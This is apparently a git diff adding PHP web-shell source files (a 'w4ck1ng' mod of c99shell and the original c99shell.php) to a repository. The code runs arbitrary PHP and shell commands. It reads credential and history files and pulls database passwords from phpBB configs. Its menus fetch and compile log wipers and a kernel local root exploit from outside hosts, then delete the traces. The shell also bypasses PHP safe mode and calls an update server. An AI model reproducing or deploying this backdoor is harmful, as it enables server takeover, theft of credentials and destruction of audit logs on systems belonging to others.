($eval_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; + } + else {echo $ret."<br>";} + } + else + { + if ($eval_txt) + { + echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; + eval($eval); + echo "</textarea>"; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}} + echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; +} +if ($act == "f") +{ + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} + else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} + } + else + { + $r = @file_get_contents($d.$f); + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( + array("[hex]","info"), + array("[html]","html"), + array("[txt]","txt"), + array("[Code]","code"), + array("[Session]","phpsess"), + array("[exe]","exe"), + array("[SDB]","sdb"), + array("[gif]","img"), + array("[ini]","ini"), + array("[download]","download"), + array("[rtf]","notepad"), + array("[change]","edit") + ); + echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;[$ext]&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>"; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";} + elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";} + else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";} + echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; + } + echo "<hr size=\"1\" noshade>"; + if ($ft == "info") + { + echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; + if (!$win) + { + echo "<tr><td><b>Owner/Group</b></td><td> "; + $ow = posix_getpwuid(fileowner($d.$f)); + $gr = posix_getgrgid(filegroup($d.$f)); + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + } + echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>"; + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} + else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000<br>"; + $a1 = ""; + $a2 = ""; + for ($i=0; $i<strlen($str); $i++) + { + $a1 .= sprintf("%02X",ord($str[$i]))." "; + switch (ord($str[$i])) + { + case 0: $a2 .= "<font>0</font>"; break; + case 32: + case 10: + case 13: $a2 .= "&nbsp;"; break; + default: $a2 .= htmlspecialchars($str[$i]); + } + $n++; + if ($n == $hexdump_rows) + { + $n = 0; + if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} + $a1 .= "<br>"; + $a2 .= "<br>"; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} + echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; + } + $encoded = ""; + if ($base64 == 1) + { + echo "<b>Base64 Encode</b><br>"; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "<b>Base64 Encode + Chunk</b><br>"; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "<b>Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "</b><br>"; + } + if (!empty($encoded)) + { + echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; + } + echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> +<P>"; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {c99shexit();} + } + elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} + elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} + elseif ($ft == "phpsess") + { + echo "<pre>"; + $v = explode("|",$r); + echo $v[0]."<br>"; + var_dump(unserialize($v[1])); + echo "</pre>"; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; + } + elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} + elseif ($ft == "code") + { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "<b>phpBB configuration is detected in this file!<br>"; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} + echo "Parameters for manual connect:<br>"; + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} + echo "</b><hr size=\"1\" noshade>"; + } + } + echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; + if (!empty($white)) {@ob_clean();} + highlight_file($d.$f); + if (!empty($white)) {c99shexit();} + echo "</div>"; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".filesize($d.$f)); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo $r; + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + $inf = getimagesize($d.$f); + if (!$white) + { + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "<center><b>Size:</b>&nbsp;"; + $sizes = array("100","50","20"); + foreach ($sizes as $v) + { + echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">"; + if ($imgsize != $v ) {echo $v;} + else {echo "<u>".$v."</u>";} + echo "</a>&nbsp;&nbsp;&nbsp;"; + } + echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "<b>Can't write to file!</b>";} + else + { + echo "<b>Saved!</b>"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; + } + elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} + else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} + } +} +} +else +{ + @ob_clean(); + //For simple size- and speed-optimization. + $imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_js"=>array("ext_js","ext_vbs"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + ); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($images[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($images[$img]); + } + else + { + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}} + natsort($images); + $k = array_keys($images); + echo "<center>"; + foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";} + echo "</center>"; + } + exit; +} +?> +</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr><td width="100%" height="1" valign="top"><center><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><br/><b>Local Command:</b> <input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center"><br/> + <b> Quick Commands </b></div> + <form action="<?php echo $surl; ?>"> + <div align="center"> + <input type=hidden name=act value="cmd"> + <input type=hidden name="d" value="<?php echo $dispd; ?>"> + <SELECT NAME="cmd"> + <OPTION VALUE="#"> [File Manipulation] + <OPTION VALUE=""> + <OPTION VALUE="lsattr -va">List file attributes on a Linux second extended file system + <OPTION VALUE="find / -type f -perm -04000 -ls">Find suid files + <OPTION VALUE="find . -type f -perm -04000 -ls">Find suid files in current directory + <OPTION VALUE="find / -type f -perm -02000 -ls">Find sgid files + <OPTION VALUE="find . -type f -perm -02000 -ls">Find sgid files in current directory + <OPTION VALUE="ls -lia">List you current directory's files, folders, & permissions + <OPTION VALUE="find / -type f -name config.inc.php">Find config.inc.php files + <OPTION VALUE="find . -type f -name config.inc.php">Find config.inc.php files in current directory + <OPTION VALUE="find / -type f -name "config*">Find config* files + <OPTION VALUE="find . -type f -name "config*">Find config* files in current directory + <OPTION VALUE="find / -type f -perm -2 -ls">Find all writable files + <OPTION VALUE="find . -type f -perm -2 -ls">Find all writable files in current directory + <OPTION VALUE="find / -perm -2 -ls">Find all writable directories and files + <OPTION VALUE="find . -perm -2 -ls">Find all writable directories and files in current directory + <OPTION VALUE="find / -type f -name service.pwd">Find all service.pwd files + <OPTION VALUE="find . -type f -name service.pwd">Find service.pwd files in current directory + <OPTION VALUE="find / -type f -name .htpasswd">Find all .htpasswd files + <OPTION VALUE="find . -type f -name .htpasswd">Find .htpasswd files in current directory + <OPTION VALUE="find / -type f -name .bash_history">Find all .bash_history files + <OPTION VALUE="find . -type f -name .bash_history">Find .bash_history files in current directory + <OPTION VALUE="find / -type f -name .mysql_history">Find all .mysql_history files + <OPTION VALUE="find . -type f -name .mysql_history">Find .mysql_history files in current directory + <OPTION VALUE="find / -type f -name .fetchmailrc">Find all .fetchmailrc files + <OPTION VALUE="find . -type f -name .fetchmailrc">Find .fetchmailrc files in current directory + <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs + <OPTION VALUE=""> + <OPTION VALUE="#"> [Directory Malipulation] + <OPTION VALUE=""> + <OPTION VALUE="pwd">List your current directory + <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Is /etc/ writable? + <OPTION VALUE="find / -type d -perm -2 -ls">Find all writable directories +<OPTION VALUE="find . -type d -perm -2 -ls">Find all writable directories in current directory +<OPTION VALUE="find / -type d -perm -2 -ls">Find all writable directories +<OPTION VALUE="find . -type d -perm -2 -ls">Find all writable directories in current directory +<OPTION VALUE=""> +<OPTION VALUE="#"> [Miscellaneous Commands] +<OPTION VALUE=""> + <OPTION VALUE="tar -cvf NEWTAR!!.tar -c <?php passthru('pwd'); ?>">Tar your current directory. (Only works if the directory is writable) + <OPTION VALUE="uname -a">Kernel version + <OPTION VALUE="w">Logged in users + <OPTION VALUE="lastlog">Last users to connect + <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins + <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">Users without passwords + <OPTION VALUE="cat /proc/version /proc/cpuinfo">CpuInfo + <OPTION VALUE="netstat -atup | grep IST">Open ports + <OPTION VALUE=""> + <OPTION VALUE="#"> [Application Verification] + <OPTION VALUE=""> + <OPTION VALUE="which wget curl w3m lynx">Check For Downloaders (WGET, et cetera) + <OPTION VALUE="locate gcc">Check For GCC + <OPTION VALUE=""> + <OPTION VALUE="#"> [Log Cleaners] + <OPTION VALUE=""> + <OPTION VALUE="wget http://packetstormsecurity.org/UNIX/penetration/log-wipers/logcleaner-0.3.c">Wipelogs (Part 1)(Zap3) + <OPTION VALUE="gcc logcleaner-0.3.c -o logcleaner-0.3">Wipelogs (Part 2)(Zap3) + <OPTION VALUE="./logcleaner-0.3 <? echo $_SERVER["REMOTE_ADDR"]; ?>">Wipelogs (Part 3)(Zap3) + <OPTION VALUE="Gone!<? if($_REQUEST['cmd']=="Gone!") { if (file_exists("logcleaner-0.3.c")) { unlink("logcleaner-0.3.c"); } if (file_exists("logcleaner-0.3")) { unlink("logcleaner-0.3"); } } ?>">Remove All Zap3 Traces + <OPTION VALUE=""> + <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/vanish.c">Wipelogs (Part 1)(Vanish) + <OPTION VALUE="gcc vanish.c -o vanish">Wipelogs (Part 2)(Vanish) + <OPTION VALUE="./vanish <? echo exec('whoami'); ?> <? echo $_SERVER["REMOTE_ADDR"]; ?> <? echo gethostbyname($_SERVER["HTTP_HOST"]); ?>">Wipelogs (Part 3)(Vanish) + <OPTION VALUE="Gone!!<? if($_REQUEST['cmd']=="Gone!!") { if (file_exists("vanish.c")) { unlink("vanish.c"); } if (file_exists("vanish")) { unlink("vanish"); } } ?>">Remove All Vanish Traces + <OPTION VALUE=""> + <OPTION VALUE="#"> [Root Exploits] + <OPTION VALUE=""> + <OPTION VALUE="wget http://www.synsta.templatez.org/1.txt">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 1) + <OPTION VALUE="mv 1.txt exploit.c">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 2) + <OPTION VALUE="gcc exploit.c -o exploit">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 3) + <OPTION VALUE="./exploit">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 4) + <OPTION VALUE="Gone!!!<? if($_REQUEST['cmd']=="Gone!!!") { if (file_exists("exploit.c")) { unlink("exploit.c"); } if (file_exists("1.txt")) { unlink("1.txt"); } if (file_exists("exploit")) { unlink("exploit"); } } ?>">Remove All Exploit Traces + </SELECT> + + <input type=hidden name="cmd_txt" value="1"> + &nbsp; + <input type=submit name=submit value="Execute"></div> + </form> + </td> + <td width="50%" height="83" valign="top"><center> + <center><br/><b> Kernel Information </b> +<form action=http://google.com/search name=f><input type=hidden name=client value="firefox-a"><input type=hidden name=rls value="org.mozilla:en-US:official_s"><input type=hidden name=hl value=en><input id=sf maxLength=256 name=q value="<?php echo wordwrap(php_uname()); ?>" size=80> +&nbsp; +<input type=submit value="Search" name=btnG></form> +</center> + </td> +</tr></TABLE> +<br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center"><strong>PHP Safe-Mode Bypass (Read Files) </strong></div> + <br> + <form action="<?php echo $surl; ?>" method="post"> + <div align="center"> + File: <input type="text" name="file"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br> + <?php + function rsg_read() + { + $test=""; + $temp=tempnam($test, "cx"); + $file=$_REQUEST['file']; + $get=htmlspecialchars($file); + echo "</br>Trying To Get File <font color=#000099><b>$get</b></font><br>"; + if(copy("compress.zlib://".$file, $temp)){ + $fichier = fopen($temp, "r"); + $action = fread($fichier, filesize($temp)); + fclose($fichier); + $source=htmlspecialchars($action); + + + echo "<div class=\"shell\"></br><b>Reading $get:</b><br><br><textarea rows=10 cols=50>$source</textarea><br>"; + unlink($temp); + } else { + echo("</br><FONT COLOR=\"RED\"><CENTER>Sorry... File + <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have + access.</CENTER></FONT>"); + } + echo "</div>"; + } + + if(isset($_REQUEST['file'])) +{ +rsg_read(); +} + + ?> + + <? + + function rsg_glob() +{ +$chemin=$_REQUEST['directory']; +$files = glob("$chemin*"); +echo "</br>Trying To List Folder <font color=#000099><b>$chemin</b></font><br>"; +foreach ($files as $filename) { + echo "<pre>"; + echo "$filename\n"; + echo "</pre>"; +} +} + +if(isset($_REQUEST['directory'])) +{ +rsg_glob(); +} + +?> + + <br> + </div> + </form> + </td> + <td width="50%" height="83" valign="top"><center> + <center> + <strong>PHP Safe-Mode Bypass (List Directories)</strong>: + <form action="<?php echo $surl; ?>" method="post"> + <div align="center"><br> + Dir: <input type="text" name="directory"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br> + + </form></center> + </td> +</tr></TABLE> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr> + <td width="50%" height="1" valign="top"><center> + <b>Search</b> + <form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1" checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td> + <td width="50%" height="1" valign="top"><center> + <b>Upload</b> + <form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> +</tr> +</table> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center> + <b><strong>Create Directory + </strong> + <p><form action="<?php echo $PHP_SELF; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center> + <strong>Create File </strong> + <form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> + +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center> + <b>Enter Directory </b> + <form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center> + <b>Access File</b> + <form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table> +</td> +</tr> +</TABLE> +<br><TABLE width="100%" height=1 border=1 cellPadding=0 cellSpacing=0 borderColorLight=#c0c0c0 borderColorDark=#666666 bgColor=#333333 style="BORDER-COLLAPSE: collapse"> + <tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell modded by <a href=http://w4ck1ng.com class="style1">w4ck1ng</a>. | <? echo("$shver"); ?> | Page generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</p></td></tr></table> +<br/></body></html><?php chdir($lastdir); c99shexit(); ?> + diff --git a/php/PHPshell/c99_w4cking/c99_w4cking2.jpg b/php/PHPshell/c99_w4cking/c99_w4cking2.jpg new file mode 100644 index 0000000..e1d451a Binary files /dev/null and b/php/PHPshell/c99_w4cking/c99_w4cking2.jpg differ diff --git a/php/PHPshell/c99shell/c99shell.jpg b/php/PHPshell/c99shell/c99shell.jpg new file mode 100644 index 0000000..3b56c02 Binary files /dev/null and b/php/PHPshell/c99shell/c99shell.jpg differ diff --git a/php/PHPshell/c99shell/c99shell.php b/php/PHPshell/c99shell/c99shell.php new file mode 100644 index 0000000..3001c1e --- /dev/null +++ b/php/PHPshell/c99shell/c99shell.php @@ -0,0 +1,2900 @@ +<?php +/* +****************************************************************************************************** +* +* c99shell.php v.1.0 (îٍ 5.02.2005) +* Freeware WEB-Shell. +* © CCTeaM. +* c99shell.php - ّهëë ÷هًهç www-لًîَçهً. +* آû ىîوهٍه ٌêà÷àٍü ïîٌëهني‏‏ âهًٌè‏ يà نîىàّيهé ًٌٍàيè÷êه ïًîنَêٍà: http://ccteam.ru/releases/c99shell +* +* WEB: http://ccteam.ru +* UIN: 656555 +* +* آîçىîويîٌٍè: +* ~ َïًàâëهيèه ôàéëàىè/ïàïêàىè, çàêà÷èâàيèه è ٌêà÷èâàيèه ôàéëîâ è ïàïêîê (ïًهنâîًèٍهëüيî ٌوèىàهٌٍے â tar) +* modify-time è access-time َ ôàéëîâ يه ىهيے‏ٌٍے ïًè + ًهنàêٍèًîâàيèè ôàéëîâ (âûêë./âêë. ïàًàىهًٍîى $filestealth) +* ~ ïًîنâèيٍَûé ïîèٌê ïî ôàéëàى/ïàïêàى (èùهٍ ٍàêوه âيًٍَè ôàéëîâ) +* ~ َïًàâëهيèه ïًîِهٌٌàىè unix-ىàّèيû, âîçىîويîٌٍü îٍïًàâêè ٌèميàëà çàâهًّهيèے, + à ٍàêوه لàيàëüيîه "ïًèلèâàيèه" ïًîِهٌٌà. +* ~ َنîليîه (èيîمنà مًàôè÷هٌêîه) âûïîëيهيèه ّهëë-êîىàين (ىيîمî àëèàٌîâ, ىîويî ëهمêî نîلàâëےٍü/َنàëےٍü èُ) +* ~ âûïîëيهيèه ïًîèçâîëüيîمî PHP-êîنà +* ~ âîçىîويîٌٍü لûًٌٍîمî ٌàىî-َنàëهيèے ٌêًèïٍà +* ~ لûًٌٍîه ftp-ٌêàيèًîâàيèه يà ٌâےçêè login;login èç + /etc/passwd (îلû÷يî نàهٍ نîٌٍَï ê 1/100 àêêàَيٍîâ) +* ~ ïًîنâèيٍَûé ىهيهنوهً SQL +* ~ ٌêًèïٍ "ë‏لèٍ" include, نëے يîًىàëüيîé ًàلîٍû, آàى يَويî ٌىهيèٍü $surl. +* ~ âîçىîويîٌٍü çàلèينèٍü /bin/bash يà îïًهنهëهييûé ïîًٍ ٌ ïًîèçâîëüيûى ïàًîëهى, + èëè ٌنهëàٍü back connect (ïًîèçâîنèٌٍے ٍهٌٍèًîâàيèه ٌîهنهيهيèے, + è âûâîنےٌٍے ïàًàىهًٍû نëے çàïٌَêà NetCat). +* +* +* 5.02.2005 © Captain Crunch Security TeaM +* +* Coded by tristram +****************************************************************************************************** +*/ +$shver = "1.0 beta (5.02.2005)"; //Current version +//CONFIGURATION +$surl = "?"; //link to this script, INCLUDE "?". +$rootdir = "./"; //e.g "c:", "/","/home" +$timelimit = 60; //limit of execution this script (seconds). + +//Authentication + +$login = ""; //login +//DON'T FOGOT ABOUT CHANGE PASSWORD!!! +$pass = ""; //password +$md5_pass = ""; //md5-cryped pass. if null, md5($pass) +$login = false; //turn off authentication + +$autoupdate = true; //Automatic updating? + +$updatenow = false; //If true, update now + +$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/?version=".$shver."&"; //Update server + +$autochmod 